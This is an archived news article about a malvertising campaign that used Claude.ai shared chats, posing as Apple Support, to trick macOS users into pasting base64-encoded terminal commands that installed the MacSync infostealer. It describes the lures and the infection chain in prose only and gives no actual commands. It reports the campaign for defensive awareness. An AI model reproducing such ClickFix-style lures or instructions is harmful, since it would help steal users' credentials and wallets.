Hackers Abuse Claude.ai Shared Chat Feature to Host the ClickFix Social Engineering Instructions
Cybersecurity NewsArchived Jun 18, 2026✓ Full text saved
Hackers are increasingly exploiting trusted AI platforms to deliver sophisticated social engineering attacks, with a recent campaign abusing Claude.ai’s shared chat feature to host malicious ClickFix instructions. According to TrendAI Research, attackers deployed 106 unique malicious hostnames across six campaign waves within seven weeks, continuously rotating infrastructure and testing different AI-themed lures to maximize effectiveness. […] The post Hackers Abuse Claude.ai Shared Chat Feature
Full text archived locally
✦ AI Summary· Claude Sonnet
HomeAI
Hackers Abuse Claude.ai Shared Chat Feature to Host the ClickFix Social Engineering Instructions
By Abinaya
June 18, 2026
Hackers are increasingly exploiting trusted AI platforms to deliver sophisticated social engineering attacks, with a recent campaign abusing Claude.ai’s shared chat feature to host malicious ClickFix instructions.
According to TrendAI Research, attackers deployed 106 unique malicious hostnames across six campaign waves within seven weeks, continuously rotating infrastructure and testing different AI-themed lures to maximize effectiveness.
The operation marks a significant evolution in ClickFix tactics, shifting from traditional malicious hosting to trusted platforms like Claude.ai.
The campaign initially relied on GitLab Pages, using over 90 malicious subdomains hosted under the trusted *. gitlab.io domain.
These pages impersonated popular AI developer tools, including Claude AI, ChatGPT Codex, Perplexity, Cursor IDE, and JetBrains.
By leveraging Google Ads, threat actors targeted users actively searching for these tools, increasing the likelihood of interaction from technically skilled individuals.
ClickFix attacks rely on tricking users into manually executing malicious commands. In this campaign, victims were instructed to copy and paste terminal or PowerShell commands under the pretense of installing or fixing software.
Claude Shared Chats Abused for ClickFix Attacks
This technique bypasses many traditional security controls because the user unknowingly executes the payload. The campaign escalated significantly in May 2026, when attackers pivoted to abusing Claude.ai’s shared chat feature.
Claude Malvertising Campaign Infection Chain (Source: TrendMicro)
Instead of directing victims to suspicious domains, malicious ads redirected users to legitimate Claude.ai shared chat URLs. These pages appeared trustworthy, effectively bypassing browser warnings, URL inspection, and Safe Browsing protections.
Once on the page, victims encountered fake support conversations impersonating entities such as Apple Support or development teams.
These chats provided step-by-step instructions for opening a terminal and executing a command. The command typically included a base64-encoded script that, once decoded, fetched a second-stage payload.
Top 20 Countries Targeted by the Campaign (Source: TrendMicro)
Analysis revealed that the payload delivered the MacSync infostealer, which targets macOS systems. The malware collects browser credentials, cookies, SSH keys, and cryptocurrency wallet data, then exfiltrates them to attacker-controlled servers.
Notably, the malware includes a check for Russian keyboard layouts, likely to avoid infecting systems in CIS regions.
The campaign’s geographic targeting was heavily concentrated in the Asia-Pacific region, which accounted for over 67 percent of victims.
“Running Claude Code on Mac” – A Shared Chat Posing as Apple Support (Source: TrendMicro)
Taiwan alone represented more than 30 percent of observed traffic, followed by Japan and Singapore. Later waves expanded targeting to countries including India, France, and Italy, indicating ongoing optimization of ad targeting strategies.
TrendAI researchers observed at least 45 malicious Claude.ai shared chat instances in early stages, increasing to over 60 in later waves.
This shift to trusted infrastructure removes many traditional detection signals, leaving user awareness as the primary defense.
Top 10 Countries by Confirmed Victim Interactions (Source: TrendMicro)
Following responsible disclosure, Anthropic took action by banning the malicious accounts, removing harmful shared chats, and implementing additional safeguards to prevent abuse of the feature.
Security experts warn that this campaign highlights a broader trend where attackers weaponize legitimate platforms to evade detection. As AI tools become more embedded in developer workflows, such abuse is expected to increase.
Organizations are advised to educate users about ClickFix-style attacks, monitor unusual command execution, and deploy endpoint detection solutions.
Users should avoid installing software via search ads, verify URLs carefully, and never execute commands from untrusted sources.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
Tags
cyber security
cyber security news
Copy URL
Linkedin
Twitter
ReddIt
Telegram
Abinayahttps://cybersecuritynews.com/
Abi is a Security Editor and fellow reporter with Cyber Security News. She is covering various cyber security incidents happening in the Cyber Space.
Trending News
152 Chrome Extensions Hide Ad Tracking and Fake Google Search Traffic
Google Sues Chinese Cybercrime Network for Using Gemini AI to Launch Cyberattacks
SHEETCREEP C# RAT Abuses Google Sheets API as C2 to Target Diplomatic Organizations
Critical Wazuh Vulnerability Lets Attackers Tamper with Alerts and Delete Security Evidence
Google Patches 28 Chrome Vulnerabilities that Allow Attackers to Execute Malicious Code
Latest News
Technology
Modern Data Protection Standards: How Organizations Are Strengthening Cybersecurity in 2026
Cyber Security News
F5 Patches NGINX Vulnerability That Enables Code Execution and DoS Attacks
Cyber Security News
Hackers Abuse PowerShell Commands to Deliver SmartRAT Through Brazilian Bank Phishing Page
Cyber Security News
Evilginx AiTM Attack Captures Microsoft Credentials, MFA Tokens, and Authenticated Sessions
Cyber Security
PoC Exploit Released for HTTP/2 Bomb Remote DoS Vulnerability in Apache HTTP Server